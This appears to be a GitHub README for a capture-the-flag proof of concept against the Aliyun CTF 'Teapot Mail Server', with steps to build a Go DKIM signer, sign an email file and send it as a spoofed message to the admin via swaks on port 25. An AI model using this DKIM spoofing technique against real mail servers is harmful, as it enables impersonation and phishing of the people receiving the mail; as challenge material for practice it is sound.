Skip to content

Latest commit

 

History

History
17 lines (12 loc) · 389 Bytes

File metadata and controls

17 lines (12 loc) · 389 Bytes

Aliyun CTF Teapot Mail Server DKIM spoofing fast poc

Usage

update file of <your domain> to your domain and make the DKIM for your domain

Save your private key as mail.pem

go build -o signer.exe signer.go
./signer.exe [mailname].eml
# find the bodyhash
swaks --data output2.eml \
  --to admin --from [email protected] \
  --server TheTeapotServer --port 25